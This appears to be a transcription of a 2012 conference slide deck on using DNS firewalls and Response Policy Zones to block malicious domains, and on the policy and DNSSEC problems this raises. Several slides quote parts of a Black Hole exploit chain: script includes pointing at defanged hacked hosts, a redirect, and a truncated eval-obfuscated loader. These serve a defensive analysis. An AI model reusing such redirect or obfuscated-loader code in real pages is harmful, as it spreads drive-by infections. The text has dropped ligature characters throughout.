Using the DNS as a Hammer The Good, the Bad and the Ugly

Transcription

1 Using the DNS as a Hammer The Good, the Bad and the Ugly SATIN March 22, 2012

2 March 22, 2012, SATIN Conference

3 March 22, 2012, SATIN Conference

4 Presenter: Rod Rasmussen Rod.Rasmussen<at>InternetIdenBty.com President & CTO Internet IdenBty Co- Chair APWG Internet Policy CommiOee Recently joined SSAC AcBve member FIRST, MAAWG, DNS- OARC, Digital Phish- Net, RISG, OTA FCC CSRIC

5 State of Play Malicious domains/hosts created regularly Heavy abuse conbnues usually registrar specific malware the driver today Enterprises aoacked stealthily via hostnames (Aurora, Night Dragon, Shady RAT) Governments have discovered the DNS RIAA, MPAA, trademark/ip holders have discovered the DNS

6 Nails Malware C&C s Phishing domains Mule sites Counterfeit Goods Piracy Trademark infringement AnB- government sites Dissidents

7 The Hammer Recursive DNS servers Blocking domains/hostnames Filtering/redirecBng domains/hostnames DiOo with IP addresses via reverse resolubon Specialized nameserver so_ware or add- ons BIND RPZ s Think of this as a DNS Firewall

8 How to use the Hammer Simple really: pre- load the cache with the responses you want to give and keep them there Done regularly for various roubng/internal uses Many ways to get entries in there Can synthesize values or NX a responses Also seen some nasty CNAME stuff Get lists of hostnames to block from somewhere RPZs make this trivial, secure, and very scalable

9 RPZ Response Policy Zones Most new domain names are malicious. I am stunned by the simplicity and truth of that observabon. Every day lots of new names are added to the global DNS, and most of them belong to scammers, spammers, e- criminals, and speculators. Domains are cheap, domains are plenbful, and as a result most of them are dreck or worse. Paul Vixie "Taking Back the DNS July 30, 2010 hop:// RPZ (Response Policy Zones) the result Any BIND resolver can easily implement large- scale domain block lists Scalable: Several lists, different policies per list Fast: AutomaBcally updated with real- Bme data

10 PerspecBve is Key ProtecBng what? Enterprise network CriBcal infrastructure ISP customer base ProtecBng for whom? Your own network/employees Customers Government IP holders

11 What is the User IncenBve? Work for a company with sensibve data Don t want to lose their own PII Don t want to have computer infected Keep kids away from certain content Don t want to overpay for music/movies Want to buy stuff that s not quite legal (gray) Want to speak out against the government Want to start a revolubon

12 User and Network Operator Goals Must be aligned Alignment = use of filtering/blocking Non- alignment leads to user non- acceptance AlternaBve DNS solubons available AlternaBves to DNS itself available Users will forego protecbon against some threats (malware) to achieve their own goals (cheap music)

13 Worst- case Scenarios Rampant use of alternate, unsafe DNS servers Rise of shady so_ware that allows circumvenbon potenbally opening up new exploits Split root

14

15 The Good There would be a really cool picture of Clint Eastwood here from the movie, but I didn t want to get sued by MGM

16 Enterprises and Government Users Constant assault these days 2011 year of the data breach Spear phishing, malware via e- mail/social engineering Hacking and silent extracbon of data (aka APT) Criminal and nabon state actors Most aoacks leverage hostnames ExfiltraBon via vicbm.badguydomain.tld DUH! Plenty of data available, but not implemented at the perimeter Time to install a DNS Firewall

17 Very Tight ProtecBon Possible Enterprises have alignment with users Can dictate port 53 policy all users must use DNS Firewall recursive servers Via VPN for remote users Many solubons and list sources available Can use DNS resolubon logging to detect anomalies Previously unknown malware/data exfiltrabon DNS tunneling and malware C&C via the DNS

18 The Bad There would be a really cool picture of Lee Van Cleef here from the movie, but I didn t want to get sued by MGM

19 SOPA/PIPA and Other US LegislaBon High profile legislabon in US that would require ISPs to block domains at resolvers due to lack of acbon by other countries Agree with it or not, lack of process and/or response to long- standing issues has allowed advocates to pursue this avenue Supported by IP holders with strong backing Off the table for now, but certainly not dead

20 Worldwide Regulatory Impacts Similar effect legislabon being adopted/discussed throughout Europe Italy - > led to large- scale adopbon of alternate DNS France - > varied approach/results ACTA (not truly equivalent, but Anon thinks so ) Popping up around the world Some countries run nabonal firewalls and filtering and have for years Real implicabons for all recursive DNS operators

21 Why this doesn t work Users want the blocked content AlternaBve methods exist to get it IP address based resources you do remember that DNS just maps names to IPs right? AlternaBve DNS servers abound ISPs cannot force port 53 (anb- compebbve) DNS can use other ports, proxies Proxy servers for web and other content Breaks DNSSEC (well it will at some point)

22 The Ugly There would be a really cool picture of Eli Wallach here from the movie, but I didn t want to get sued by MGM

23 DNSSEC May Will Break Currently not an issue with recursive server level validabon Will be a major problem with endpoint validabon DNS Firewall responses are lies and DNSSEC doesn t like being lied to Will find alternabve validabon method and sbll get to the bad hostname This needs to be fixed for compabbility

24 The Other

25 Complex aoacks using evil domains The game is changing significantly Redirects for drive- by- downloads ObfuscaBon and hiding techniques ACL s to prevent responders from seeing issues Malware rendezvous and C&C hidden in code Abuse of whois privacy to shield criminal registrabons (ICANN studies underway) Criminals use of automated domain registrabon processes built into the malware control panel DGA for automated botnet reconnecbons

26 Sample: Black Hole Exploit Site Massive phishy spam campaigns Lures lead to compromised sites Redirect to other sites Eventual landing page uses tricks to exploit browser bugs and infect machine RedirecBon is obfuscated hard to know what domains are involved.

27 Lure e- mail Obfuscated URL: hxxp://stonehengeroofingproducts.com/emngorgc/index.html DO NOT GO TO THAT SITE WITH A WINDOWS MACHINE!!!!

28 What you get

29 First Lure Site Hacked server needs fixing Redirects to further hacked servers Modified to prevent infecbon! <html> <h1>wait PLEASE</h1> <h3>loading...</h3> <script type="text/javascript" src= hxxp://skodamene.no/clftseyg/js.js"></script> <script type="text/javascript" src= hxxp://bendabebemimos.com/jhgfzcjv/js.js"></script> <script type="text/javascript" src= hxxp://produccionesqueens.com/acfv9bml/js.js"></script> <script type="text/javascript" src= hxxp://purchasemiraclemineral.info/yxcrbqxk/js.js"></script> <script type="text/javascript" src= hxxp://successwithso_ware.com/49qkhzro/js.js"></script> <script type="text/javascript" src= hxxp://thefocuspointphotography.com/jnzxp3ea/js.js"></script> </html>

30 Intermediate Site hxxp://skodamene.no/clftseyg/js.js Another hacked site that needs cleanup Contents simply redirect elsewhere document.locabon= hxxp://hakkaboat.com/search.php?page=73a07bcb51f4be71';

31 Actual InfecBon Site hxxp://hakkaboat.com/search.php? Domain is owned by criminal Go there directly and you end up at Google Exploits various browser flaws Eventually downloads Zeus That version of Zeus controlled by several criminally controlled domains that need to be suspended as well

32 Obfuscated Code on Exploit Site <html><body><script> if(window.document) a=([].unshi_+16).substr(1,3); aa=([].unshi_+ [].unshi_).substr(1,3); if(a===aa) f={q: ["59'70'58'76'68'60'69'75'5'78'73'64'75'60'- 1'- 2'19'58'60'69'75'60'73'21'19'63'8'21'39'67'6 0'56'74'60'- 9'78'56'64'75'- 9'71'56'62'60'- 9'64'74'- 9'67'70'56'59'64'69'62'5'5'5'19'6'63'8'21' 19'6'58'60'69'75'60'73'21'19'63'73'21'- 2'0'18'61'76'69'58'75'64'70'69'- 9'60'69'59'54'73'60' 59'64'73'60'58'75'- 1'0'82'78'64'69'59'70'78'5'67'70'58'56'75'64'70'69'5'63'73'60'61'20'- Deleted 1000s of lines of code '- 1'60'69'59'54'73'60'59'64'73'60'58'75'3'15'7'7'7'0'18'84'74'71'67'7'- 1'0'18"][0]}.q.split ("'"); md='a'; e=eval; w=f; s=''; f='f'; st=e("s".concat("tri","ng")); for(i=0;i<w.length;i++) { z=w[i]; s=s.concat(st[f+'romcharcod'+'e'](41+parseint(z))); } q={run:{run:funcbon(w){e (w)}}}; q['run']['ru'+'n'](s); </script></body></html> Ge ng these shut down is HARD!

33 DNS Firewalls Easily Block These Can implement a block/redirect as soon as new exploit site idenbfied Users clicking on e- mails will never get to eventual drop site Many techniques ID bad domains prior to use Passive DNS Nameserver monitoring RegistraBon data for new domains

34 A Recent QuesBon on.su High levels of abuse on a TLD lead to potenbal full block by major organizabon Answer was, yeah, probably worth it Abuse.ch recommends blocking the enbre.su TLD: hop://

35 Wrap- up We have a variety of issues that appear to some to all be nails DNS provides an effecbve hammer If your goals are aligned (enterprise, anb- malware) Will smash your thumb if users don t want to be redirected or blocked Issues with DNSSEC need to be addressed long- term We will see a lot of this Bme to get it right is now!

36 Thank You! Now for your quesbons

37 Using the DNS as a Hammer The Good, the Bad and the Ugly SATIN March 22, 2012